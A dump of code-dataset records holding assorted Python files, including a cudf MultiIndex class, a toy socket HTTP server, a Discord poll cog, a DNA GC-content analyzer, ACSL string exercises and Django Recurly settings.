source index until it has the correct number of columns (n-k)\n if(len(out_index.columns)) > 0:\n result.reset_index(drop=True)\n result.index = result.index._popn(len(row_tuple))\n return result\n\n def _get_column_major(self, df, row_tuple):\n valid_indices = self._compute_validity_mask(df, row_tuple)\n from cudf import DataFrame\n result = DataFrame()\n for ix, col in enumerate(df.columns):\n if ix in valid_indices:\n result[ix] = list(df._cols.values())[ix]\n # Build new index - COLUMN based MultiIndex\n # ---------------\n if len(row_tuple) < len(self.levels):\n columns = self._popn(len(row_tuple))\n result.columns = columns.take(valid_indices)\n else:\n result.columns = self.take(valid_indices)\n if len(result.columns.levels) == 1:\n columns = []\n for code in result.columns.codes[result.columns.codes.columns[0]]:\n columns.append(result.columns.levels[0][code])\n name = result.columns.names[0]\n result.columns = StringIndex(columns, name=name)\n return result\n\n def __len__(self):\n return len(self.codes[self.codes.columns[0]])\n\n def __eq__(self, other):\n if not hasattr(other, 'levels'):\n return False\n return self.levels == other.levels and\\\n self.codes == other.codes and\\\n self.names == other.names\n\n @property\n def is_contiguous(self):\n return True\n\n @property\n def size(self):\n return len(self.codes[0])\n\n def take(self, indices):\n from collections.abc import Sequence\n from cudf import Series\n from numbers import Integral\n if isinstance(indices, 
(Integral, Sequence)):\n indices = np.array(indices)\n elif isinstance(indices, Series):\n indices = indices.to_gpu_array()\n codes = self.codes.take(indices)\n result = MultiIndex(self.levels, codes)\n result.names = self.names\n return result\n\n def __iter__(self):\n self.n = 0\n return self\n\n def __next__(self):\n if self.n < len(self.codes):\n result = self[self.n]\n self.n += 1\n return result\n else:\n raise StopIteration\n\n def __getitem__(self, index):\n match = self.take(index)\n result = []\n for level, item in enumerate(match.codes):\n result.append(match.levels[level][match.codes[item][0]])\n return tuple(result)\n\n @property\n def _values(self):\n return list([i for i in self])\n\n @classmethod\n def from_tuples(cls, tuples, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_tuples(tuples, names=names)\n result = cls.from_pandas(pdi)\n return result\n\n @classmethod\n def from_frame(cls, dataframe, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_frame(dataframe.to_pandas(), names=names)\n result = cls.from_pandas(pdi)\n return result\n\n @classmethod\n def from_product(cls, arrays, names=None):\n # Use Pandas for handling Python host objects\n pdi = pd.MultiIndex.from_product(arrays, names=names)\n result = cls.from_pandas(pdi)\n return result\n\n def to_pandas(self):\n pandas_codes = []\n for code in self.codes.columns:\n pandas_codes.append(self.codes[code].to_array())\n # Backwards compatibility:\n # Construct a dummy MultiIndex and check for the codes attr.\n # This indicates that it is pandas >= 0.24\n # If no codes attr is present it is pandas <= 0.23\n if hasattr(pd.MultiIndex([[]], [[]]), 'codes'):\n return pd.MultiIndex(levels=self.levels, codes=pandas_codes,\n names=self.names)\n else:\n return pd.MultiIndex(levels=self.levels, labels=pandas_codes,\n names=self.names)\n\n @classmethod\n def from_pandas(cls, multiindex):\n \"\"\"\n Convert from a Pandas MultiIndex\n\n Raises\n ------\n TypeError for invalid input type.\n\n Examples\n --------\n >>> import cudf\n >>> import pandas as pd\n >>> pmi = pd.MultiIndex(levels=[['a', 'b'], ['c', 'd']],\n codes=[[0, 1], [1, ]])\n >>> cudf.from_pandas(pmi)\n MultiIndex( ... )\n \"\"\"\n if not isinstance(multiindex, pd.MultiIndex):\n raise TypeError('not a pandas.MultiIndex')\n\n if hasattr(multiindex, 'codes'):\n mi = cls(levels=multiindex.levels,\n codes=multiindex.codes,\n names=multiindex.names)\n else:\n mi = cls(levels=multiindex.levels,\n codes=multiindex.labels,\n names=multiindex.names)\n return mi\n\n\nregister_distributed_serializer(MultiIndex)\n","sub_path":"python/cudf/dataframe/multiindex.py","file_name":"multiindex.py","file_ext":"py","file_size_in_byte":11877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
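+The levels/codes layout that the MultiIndex record above validates and round-trips can be seen with plain pandas; a minimal sketch (pandas >= 0.24, where the attribute is named codes rather than labels, as the entry's to_pandas handles):
+
+import pandas as pd
+
+pmi = pd.MultiIndex.from_tuples([('a', 'c'), ('a', 'd'), ('b', 'c')], names=['outer', 'inner'])
+print(pmi.levels)  # [['a', 'b'], ['c', 'd']] -- the unique labels per level
+print(pmi.codes)   # [[0, 0, 1], [0, 1, 0]] -- positions into those levels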
+{"seq_id":"96403898","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom second_test4ICA import *\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nres=[]\nfor i in range(rank*Freq_num/6,(rank+1)*Freq_num/6):\n res.append(ICA.RESULT(i, N, pol, A_, S_, map1, map3))\n plt.close('all')\n\nif rank!=0:\n comm.send(res,dest=0)\nelif rank==0:\n a1=comm.recv(source=1)\n a2=comm.recv(source=2)\n a3=comm.recv(source=3)\n a4=comm.recv(source=4)\n a5=comm.recv(source=5)\n res=res+a1+a2+a3+a4+a5#+a6+a7\n res=np.array(res)\n\n f=np.linspace(700,800,Freq_num,endpoint=True)\n p=np.c_[f,res]\n np.savetxt('FG_128_freq200_times1',p)\n\n# plt.clf()\n# plt.plot(f,res)\n# plt.show()\n\n","sub_path":"compare_dynamic_range.py","file_name":"compare_dynamic_range.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"343899601","text":"from discord.ext import commands\nimport os, asyncio, discord\nfrom dotenv import load_dotenv\nload_dotenv()\nred = 0xF04747\ngreen = 0x43B581\norange = 0xFAA61A\n\nclass Poll(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def poll(self, ctx, *, question):\n embed = discord.Embed(color=green, title=f\":bar_chart: {question}\")\n msg = await ctx.send(embed=embed)\n await msg.add_reaction('🔼')\n await msg.add_reaction('🔽')\n\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(Poll(bot))\n","sub_path":"utils/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"494375331","text":"import socket\r\nimport os\r\nfrom datetime import date\r\nfrom datetime import datetime\r\n\r\n\r\nTCP_IP = '127.0.0.1'\r\nTCP_PORT = 8080\r\nBUFFER_SIZE = 1024 \r\n\r\nclass Server():\r\n def __init__(self):\r\n self.mimetypes = {\r\n \"css\" : \"text/css\",\r\n \"html\" : \"text/html\",\r\n \"ico\" : \"image/x-icon\",\r\n \"jpeg\" : \"image/jpeg\",\r\n \"png\" : \"image/png\"\r\n }\r\n\r\n def listen(self): #Creación del socket y bind a un numero de puerto\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((TCP_IP, TCP_PORT))\r\n s.listen(1)\r\n \r\n while 1:\r\n while 1:\r\n conn, addr = s.accept() #Se acepta la conexión entrante\r\n print(\"Connected to:\", addr)\r\n data = conn.recv(BUFFER_SIZE).decode()\r\n self.filter_request(data, conn)\r\n if not data: break\r\n conn.close()\r\n\r\n #Método que se encarga de determinar el tipo de HTTP request y llama al método correspondiente\r\n def filter_request(self, data, conn):\r\n string_list = data.split(' ') \r\n method = string_list[0]\r\n if method == \"GET\": \r\n print(\"\\t<<< GET >>>\")\r\n self.GET(string_list, data, conn)\r\n elif method == \"HEAD\":\r\n print(\"\\t<<< HEAD >>>\")\r\n self.HEAD(string_list, conn)\r\n elif method == \"POST\":\r\n print(\"\\t<<< POST >>>\")\r\n self.POST(data, conn)\r\n else:\r\n print(\"\\t<<< NOT IMPLEMENTED >>>\")\r\n self.NOT_IMPLEMENTED(conn)\r\n\r\n #Método para el manejo del error 501\r\n def NOT_IMPLEMENTED(self, conn):\r\n try:\r\n #Construcción y envío del header\r\n header = 'HTTP/1.1 501 Method Not Implemented\\n'\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nAllow: GET, POST, HEAD'+'\\n\\n'\r\n response = 'Error 501: File not implemented
Python HTTP Server
'.encode()\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n except:\r\n pass\r\n\r\n #Método para el manejo del error 501\r\n def NOT_ACCEPTABLE(self, conn):\r\n print(\"\\t<<< NOT ACCEPTABLE >>>\")\r\n try:\r\n #Construcción y envío del header\r\n header = 'HTTP/1.1 406 Not Acceptable\\r\\n'\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nAllow: GET, POST, HEAD'+'\\n\\n'\r\n response = 'Error 406: The request is not acceptable
Python HTTP Server
'.encode()\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n except:\r\n pass\r\n\r\n #Método que retorna el mimetype\r\n def get_mime(self, type_m, conn):\r\n file_type = self.mimetypes.get(type_m, \" \")\r\n return file_type\r\n\r\n #Método que se invoca cuando llega un HEAD al servidor\r\n def HEAD(self, string_list, conn):\r\n requesting_file = string_list[1]\r\n print('Client request ',requesting_file)\r\n myfile = requesting_file.split('?')[0]\r\n myfile = myfile.lstrip('/')\r\n if(myfile == ''):\r\n myfile = 'index.html'\r\n try:\r\n header = \"HTTP/1.1 200 OK\\r\\n\" #Construcción del header\r\n extension = myfile.split('.')\r\n file_type = self.get_mime(extension[len(extension)-1], conn)\r\n if(file_type == \" \"): #En caso que la solicitd no sea ningún archivo se depeliega un mensaje de error\r\n header = ' '\r\n self.NOT_ACCEPTABLE(conn)\r\n else:\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: '+file_type+'\\n\\n' #Se añaden elementos al header\r\n\r\n #self.write_log('HEAD',socket.gethostname(),'?', requesting_file.split('?')[0], ' ') #Llamado al método que escribe en la bitácora\r\n \r\n except Exception as e: #Mensaje de error desplegado al no encontrar el archivo solicitado\r\n header = \"HTTP/1.1 404 Not Found\\n\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n final_response = header\r\n conn.send(final_response.encode()) #Envía la respuesta \r\n\r\n #Método que se invoca cuando llega un GET al servidor\r\n def GET(self, string_list, data, conn):\r\n requesting_file = string_list[1] #Contiene el tipo de solicitud del cliente\r\n print('Client request ',requesting_file) \r\n myfile = requesting_file.split('?')[0] #Obtiene el nombre del archivo que se está solicitando\r\n values=' ' #Almacena los atributos junto con los valores del GET\r\n try:\r\n values = requesting_file.split('?')[1] #Se intentan tomar los valores que vienen en el GET en caso que hayan para guardarlos en bitácora\r\n except:\r\n pass\r\n myfile = myfile.lstrip('/')\r\n if(myfile == ''): #Si viene solo un / significa que se quiere el achivo por defecto index.html\r\n myfile = 'index.html'\r\n try:\r\n #Construcción del header de respuesta\r\n header = \"HTTP/1.1 200 OK\\r\\n\"\r\n extension = myfile.split('.')\r\n file_type = self.get_mime(extension[len(extension)-1], conn) #Invocación al método que permite obtener las extensión del archivo solicitado\r\n if(file_type == \" \"): #En caso que la solicitd no sea ningún archivo se depeliega un mensaje de error\r\n header = ' '\r\n response = ''.encode()\r\n self.NOT_ACCEPTABLE(conn)\r\n else:\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: '+file_type+'\\n\\n'\r\n \r\n #Apertura del archivo solicitado para posteriormente enviarlo como respuesta\r\n file = open(myfile,'rb') #Lectura en bytes\r\n response = file.read()\r\n file.close()\r\n \r\n #Invocación del método que escribe en la bitácora del servidor\r\n self.write_log('GET',socket.gethostname(),'?', requesting_file.split('?')[0], values)\r\n\r\n except Exception as e: \r\n #Construcción del header y la respuesta en caso que el archivo solicitado no exista\r\n header = \"HTTP/1.1 404 Not found\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n response = 'Error 404: File not found
Python HTTP Server
'.encode()\r\n \r\n #Se envía el header y luego la respuesta\r\n conn.send(header.encode())\r\n conn.send(response)\r\n\r\n #Método que se invoca cuando llega un POST al servidor\r\n def POST(self, data, conn):\r\n try:\r\n #Se contruye el header para su posterior envío al cliente\r\n header = \"HTTP/1.1 200 OK\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\nContent-Type: text/html\\n\\n'\r\n\r\n values=data.split('\\r\\n') #Separación del contenido del header para obtener los valores del POST\r\n\r\n #Invocación del método que escribe en la bitácora del servidor\r\n self.write_log('POST',socket.gethostname(), socket.gethostname(), data.split(' ')[1], values[len(values)-1]) #values[len(values)-1] Contiene de los atributos con sus respectivos valores\r\n\r\n #Apertura del archivo solicitado para posteriormente enviarlo como respuesta\r\n f=open('post.html','rb') #Lectura en byte\r\n response=f.read(1024)\r\n f.close()\r\n\r\n except Exception as e:\r\n #Construcción del header y la respuesta en caso que el archivo solicitado no exista\r\n header = \"HTTP/1.1 404 Not found\\r\\n\"\r\n header += 'Date:'+date.today().strftime(\"%B %d, %Y\")+'\\nServer:'+socket.gethostname()+'\\n\\n'\r\n response = 'Error 404: File not found
Python HTTP Server
'.encode()\r\n \r\n #Envío del header y la respuesta\r\n conn.send(header.encode()) \r\n conn.send(response) \r\n \r\n \r\n # Método que documentar la bitácora de los HTTP requests que llegan al servidor\r\n def write_log(self, method, server_name, referer, url, data):\r\n logfile = open(\"log.txt\", \"a\")\r\n record = method + \"\\t\\t\\t\" + self.get_timestamp() + \"\\t\\t\\t\" + server_name + \"\\t\\t\\t\" + referer + \"\\t\\t\\t\" +url + \"\\t\\t\\t\" + data + \"\\n\"\r\n logfile.write(record)\r\n logfile.close()\r\n \r\n #Método que devuelve la marca de tiempo\r\n def get_timestamp(self):\r\n now = datetime.now()\r\n timestamp = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n return timestamp\r\n","sub_path":"mini_server.py","file_name":"mini_server.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
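+A minimal client sketch for exercising the server record above (same host/port constants; assumes an index.html exists in the server's working directory):
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('127.0.0.1', 8080))
+s.sendall(b'GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n')
+print(s.recv(1024).decode(errors='replace'))  # status line and headers, then the body
+s.close()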
+{"seq_id":"636408596","text":"#!/usr/bin/env python\n\n# Script to run beyond compare which in turn backsup important folders\n\n__author__=\"Johann Romero\" # Based mostly on \"warrenstrange\" work @ https://blogs.oracle.com/warren/entry/a_python_script_to_encode\n__date__ =\"$Jun 19, 2013 11:28:09 AM$\"\n\nimport subprocess\nimport os.path\nfrom subprocess import Popen\nfrom hsendemail import sendmail\n\ndef bcbackup():\n '''\n Executes Beyond Compare\n '''\n \n strbc = os.path.join( \"f:\\\\\", \"Users\", \"johann\", \"bkpdaemon\", \"bcomp.exe\" )\n strbcconfig = os.path.join( \"f:\\\\\", \"Users\", \"johann\", \"bkpdaemon\", \"bkp.config\" ) \n \n #print (strbc)\n #print (strbcconfig)\n \n strcmd = strbc+' @'+strbcconfig\n #print (strcmd) \n\n if os.path.exists(strbc) and os.path.exists(strbcconfig):\n subprocess.call(strcmd, shell=True)\n print (\"i'm done, sending email...\")\n sendmail(\"BC Backup Done\",\"Backup has completed, pls check log files for any errors\")\n else: \n print (\"skipping this run... Either Beyond Compare is not installed or can't find the config file\")\n \nif __name__ == \"__main__\":\n bcbackup()","sub_path":"scripts/python/home.bcbackup.py","file_name":"home.bcbackup.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"592129546","text":"import sys\nsys.stdin = open(\"이진수2.txt\")\n\nT = int(input())\nfor tc in range(1, T+1):\n num = float(input())\n change = []\n check = 0\n while 1:\n if num == 0:\n break\n if len(change) >= 13:\n check = 1\n break\n num = num*2\n if num >= 1:\n change.append('1')\n num -= 1\n else:\n change.append('0')\n if check == 1:\n print('#{} overflow'.format(tc))\n else:\n print('#{} {}'.format(tc, ''.join(change)))\n","sub_path":"work/실습/+1. Start/이진수2.py","file_name":"이진수2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"131677682","text":"import socket\nimport base64\n\nhost = '192.168.0.177'\nport = 5050\naddress = (host, port)\n\nsocket01 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nsocket01.bind(address)\nsocket01.listen(1)\nprint('Socket Startup')\n\nconn, addr = socket01.accept() \nprint('Connected by', addr)\n\n##################################################\nprint('begin write image file')\ni = 0\nwhile True:\n imgName = \"socketImage%d.jpg\" %i\n print(imgName)\n imgFile = open(imgName, 'wb')\n Break = False\n while True:\n imgData = conn.recv(1024)\n print(type(imgData))\n imgFile.write(imgData)\n if not imgData:\n print(\"enter here\")\n Break = True\n break\n if imgData[-4:] == \"over\":\n break\n \n\n if Break:\n break\n\n imgFile.close()\n i += 1\n print('image save')\n##################################################\n\nconn.close()\nsocket01.close()\nprint('server close')","sub_path":"socketServer.py","file_name":"socketServer.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"235024480","text":"\"\"\"Measure the number of demos needed for ADA to find the optimal decomposition for Taxi.\"\"\"\n\nfrom imitation import Driver\n\nfrom ada import decompose\n\nTRIALS = 100 # Number of independent trials\nREPEATS = 16 # Decomposition attempts with each group of demos\nMAX_DEMOS = 32 # Demonstrations performed before giving up on a trial\n\nsuccesses = list()\n\nfor trial in range(1, TRIALS + 1):\n print(\"Trial\", trial, \"...\")\n \n driver = Driver()\n driver.train()\n\n num_demos = 0\n demos = dict()\n optimal = False\n\n while not optimal and num_demos < MAX_DEMOS:\n driver.generate(demos)\n num_demos += 1\n repeat = 0\n \n while not optimal and repeat < REPEATS:\n optimal = decompose(demos)\n repeat += 1\n\n if optimal:\n successes.append(num_demos)\n\nprint(\"Number of successes:\", len(successes), \"/\", TRIALS)\nprint(\"Demos before success:\", sorted(successes))\n","sub_path":"tasks/taxi/imitation/decompose.py","file_name":"decompose.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435670354","text":"#\n# ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py\n# \n# Created by Zhiyu Zhu on 2/17/16\n# Copyright © 2016 WWITDC. All rights reserved.\n#\n\nimport sys\n\narray = []\nfor i in range(1,6):\n print(i, end=\". \")\n array.append(sys.stdin.readline().replace('\\n',''))\n\ndef char_split(string, length, char):\n # divide string into substrings of length `length` and connect them with char\n length = int(length)\n tmp = []\n for i in range(0,int(len(string) / length)):\n start = i * length\n end = (i+1) * length\n tmp.append(string[start:end])\n if 0 < len(string) - end < length:\n tmp.append(string[end:len(string)])\n out = char.join(tmp)\n print('1. '+out)\n\ndef strrem(string, needToRemove):\n # remove all `needToRemove` in the string\n print('2. '+string.replace(needToRemove,''))\n\ndef strchr(string, stopSign):\n # return all characters in the string before the first `stopSign`\n print('3. '+string[0:string.index(stopSign)])\n\ndef strtok(string, seperateSign):\n # return string with a space before each `seperateSign`\n tmp = string.split(seperateSign)\n print('4. '+(' '+seperateSign).join(tmp))\n\ndef wordwrap(string, maxLength, seperateSign):\n # return string that it is seperated by space before each seperateSign, and each substring is not longer than `maxLength`\n tmp = string.split(seperateSign)\n if string[0] == seperateSign:\n tmp[0] = seperateSign + tmp[0] \n for index in range(1,len(tmp)):\n tmp[index] = seperateSign + tmp[index]\n out = []\n maxLength = int(maxLength)\n for subString in tmp:\n if len(subString) <= maxLength:\n out.append(subString)\n else:\n for i in range(0,int(len(subString) / maxLength)):\n start = i * maxLength\n end = (i+1) * maxLength\n out.append(subString[start:end])\n if 0 < len(subString) - end < maxLength:\n out.append(subString[end:len(subString)])\n print('5. '+(' '.join(out))) \n\ndata = array[0].split(',')\nchar_split(data[0],data[1],data[2])\ndata = array[1].split(',')\nstrrem(data[0],data[1])\ndata = array[2].split(',')\nstrchr(data[0],data[1])\ndata = array[3].split(',')\nstrtok(data[0],data[1])\ndata = array[4].split(',')\nwordwrap(data[0],data[1],data[2])\n","sub_path":"2015-2016/2/ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py","file_name":"ACSL_2015_2016_Contest_#_2_Zhiyu_Zhu.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"624989727","text":"# Name: Henry Rebbeck\n# CSE 140\n# Homework 2: DNA analysis\n\n# This program reads DNA sequencer output and computes statistics, such as\n# the GC content. Run it from the command line like this:\n# python dna_analysis.py myfile.fastq\n\n\n###########################################################################\n# Libraries\n###\n\n# The sys module supports reading files, command-line arguments, etc.\nimport sys\n\n\n###########################################################################\n# Read the nucleotides into a variable named seq\n###\n\n# You need to specify a file name\nif len(sys.argv) < 2:\n print(\"You must supply a file name as an argument\\\n when running this program.\")\n sys.exit(2)\n# The file name specified on the command line, as a string.\nfilename = sys.argv[1]\n# A file object from which data can be read.\ninputfile = open(filename)\n\n# All the nucleotides in the input file that have been read so far.\nseq = \"\"\n# The current line number (= the number of lines read so far).\nlinenum = 0\n\n\nfor line in inputfile:\n linenum = linenum + 1\n # if we are on the 2nd, 6th, 10th line...\n if linenum % 4 == 2:\n # Remove the newline characters from the end of the line\n line = line.rstrip()\n seq = seq + line\n\n\n########################################################################\n# Compute statistics\n###\n\n# Total nucleotides seen so far.\ntotal_count = 0\n# Number of G and C nucleotides seen so far.\ngc_count = 0\nat_count = 0\na_count = 0\nc_count = 0\ng_count = 0\nt_count = 0\nerr_count = 0\n\n\n# for each base pair in the string,\nfor bp in seq:\n # increment the total number of bps we've seen\n total_count = total_count + 1\n\n # next, if the bp is a G or a C,\n if bp == 'C' or bp == 'G':\n # increment the count of gc\n gc_count = gc_count + 1\n\n # next, if the bp is as A or a T,\n if bp == 'A' or bp == \"T\":\n at_count = at_count + 1\n if bp == 'G':\n g_count = g_count + 1\n if bp == 'C':\n c_count = c_count + 1\n if bp == 'A':\n a_count = a_count + 1\n if bp == 'T':\n t_count = t_count + 1\n '''\n if bp != 'A' and bp != 'C' and bp != 'G' and bp != 'T':\n err_count = err_count + 1\n print(\"Error at count\", a_count + c_count + g_count + t_count)\n print(\"BP = \", bp)\n '''\n\n# divide the gc_count by the total_count to find %\n# use the g,c,a,t count rather than total as there are\n# some errors in the total which should not be included\n\nsum_gcat = g_count + c_count + a_count + t_count\ngc_content = float(gc_count) / sum_gcat\n\n# divide the at count by the total_count to find %\nat_content = float(at_count) / sum_gcat\n\n# divide the indvidual count by the total_count to find %\ng_content = float(g_count) / total_count\nc_content = float(c_count) / total_count\na_content = float(a_count) / total_count\nt_content = float(t_count) / total_count\n\n\n# Print the answer\nprint('GC-content:', gc_content)\n# Print the answer\nprint('AT-content:', at_content)\n\n# Print the % of ecah nucleotide\n''' Not needed\nprint('G-content:', g_content)\nprint('C-content:', c_content)\nprint('A-content:', a_content)\nprint('T-content:', t_content)\n'''\n\n# Print the count of each nucleotide\nprint('G-Count:', g_count)\nprint('C-Count:', c_count)\nprint('A-Count:', a_count)\nprint('T-Count:', t_count)\n\n# print the sum of each letter\nsum_count = a_count + c_count + g_count + t_count\nprint('Sum of G,C,A,T count', sum_count)\n\n# Check to see if the total % nucleotide summs to 100%\n# sum_content = a_content + c_content + 
g_content + t_content\n# print('Sum of G, C, A and T:', sum_content)\nprint('Total count:', total_count)\nlength_of_seq = len(seq)\nprint('Length of sequence:', length_of_seq)\n\n# Print the AT/GC Ratio\nprint('AT/GC Ratio: ', (a_count + t_count) / (g_count + c_count))\n\n# print errors\n# print('Error count', err_count)\n\n# Classify the resulting GC content into high, medium low GC\nif gc_content > 0.6:\n print('GC Classification: high GC content')\nelif gc_content < 0.4:\n print('GC Classification: low GC content')\nelse:\n print('GC Classification: moderate GC content')\n","sub_path":"hw/hw08/dna_analysis.py","file_name":"dna_analysis.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
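+The statistic the record above computes is GC content = (G + C) / (A + C + G + T); a worked check on a six-base sequence:
+
+seq = "ATGGCC"
+gc = sum(bp in "GC" for bp in seq) / len(seq)
+print(round(gc, 3))  # 0.667 -> "high GC content" under the > 0.6 rule above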
+{"seq_id":"325205504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 25 23:41:53 2021\r\n\r\n@author: MrSan\r\n\"\"\"\r\n\r\nimport socket\r\nimport os\r\nfrom _thread import *\r\nimport struct\r\n\r\n\r\n#store target location\r\nclass target_list:\r\n def __init__(self):\r\n self.lat = bytearray(struct.pack(\"f\", 0.000))\r\n self.lon = bytearray(struct.pack(\"f\", 0.000))\r\n \r\n def setter(self, lat, lon):\r\n self.lat = lat\r\n self.lon = lon\r\n #self.lon = lon\r\n \r\n#-------------------------------create socket----------------------------------\r\nServerSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\nThreadCount = 0\r\ntry:\r\n ServerSocket.bind((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nprint('Waitiing for a Connection..')\r\nServerSocket.listen(5) #start listening to the port\r\n\r\nnew = target_list() #initialize target_list calls to store target cordinates\r\n\r\ndef threaded_client(connection): #serve client requests\r\n while True:\r\n Response = connection.recv(2) #recive client request 0 or 1\r\n req = int.from_bytes(Response, \"big\") #decode client request from byte to int\r\n print(req)\r\n if req == 0:\r\n connection.send(new.lat) #send latitude stored in class target_list class\r\n connection.send(new.lon) #send longitude stored in class target_list class\r\n \r\n if req == 1:\r\n lat = connection.recv(4) #recive latitude from client\r\n [x] = struct.unpack('f', lat) #decode from byte to float\r\n \r\n lon = connection.recv(4) #recive longitude from client\r\n [y] = struct.unpack('f', lon) #decode to float\r\n print(x)\r\n print(y)\r\n new.setter(lat , lon) #storre latitude and longitude in target_list class using setter function\r\n \r\n connection.close()\r\n\r\n#-------------------initiate new client connection-----------------------------------\r\nwhile True:\r\n Client, address = ServerSocket.accept() #connect to client\r\n print('Connected to: ' + address[0] + ':' + str(address[1])) #print client details\r\n start_new_thread(threaded_client, (Client, )) #create a thread for client\r\n ThreadCount += 1\r\n print('Thread Number: ' + str(ThreadCount))\r\nServerSocket.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"final review demo/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"457548809","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nimport recurly\n\n\n### Recurly API Settings ###\n\nAPI_KEY = getattr(settings, 'RECURLY_API_KEY', None)\nSUBDOMAIN = getattr(settings, 'RECURLY_SUBDOMAIN', None)\n\nJS_PRIVATE_KEY = getattr(settings, 'RECURLY_JS_PRIVATE_KEY', None)\nCA_CERTS_FILE = getattr(settings, 'RECURLY_CA_CERTS_FILE', None)\n\nDEFAULT_CURRENCY = getattr(settings, 'RECURLY_DEFAULT_CURRENCY', 'USD')\n\n# The username & password used to authorise Recurly's\n# postback notifications. In the format \"username:password\"\nHTTP_AUTHENTICATION = getattr(settings, 'RECURLY_HTTP_AUTHENTICATION', None)\n\n# You probably don't need to mess with these, but just in case.\nBASE_URI = getattr(settings, 'RECURLY_BASE_URI', None)\n\n\n### Django settings ###\n\n# For the love of all things holy, please keep this set to a sensible\n# (i.e. unchanging / non daylight saving) timezone. This determines the\n# timezone in which django_recurly stores dates in the DB, so if you\n# change this down the road then all your subscription dates will skew.\n# The sane thing to do here is to keep this as UTC and handle the\n# timezone conversion in your display logic.\nTIME_ZONE = getattr(settings, 'TIME_ZONE', 'UTC')\n\n### Django-Recurly settings ###\n\nRECURLY_ACCOUNT_CODE_TO_USER = getattr(settings, 'RECURLY_ACCOUNT_CODE_TO_USER',\n None)\n\n\n# Configure the Recurly client\nrecurly.API_KEY = API_KEY\n\nif JS_PRIVATE_KEY is not None:\n recurly.js.PRIVATE_KEY = JS_PRIVATE_KEY\n\nif CA_CERTS_FILE is not None:\n recurly.CA_CERTS_FILE = CA_CERTS_FILE\n\nif DEFAULT_CURRENCY is not None:\n recurly.DEFAULT_CURRENCY = DEFAULT_CURRENCY\n\nif BASE_URI is not None:\n recurly.BASE_URI = BASE_URI\n","sub_path":"django_recurly/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
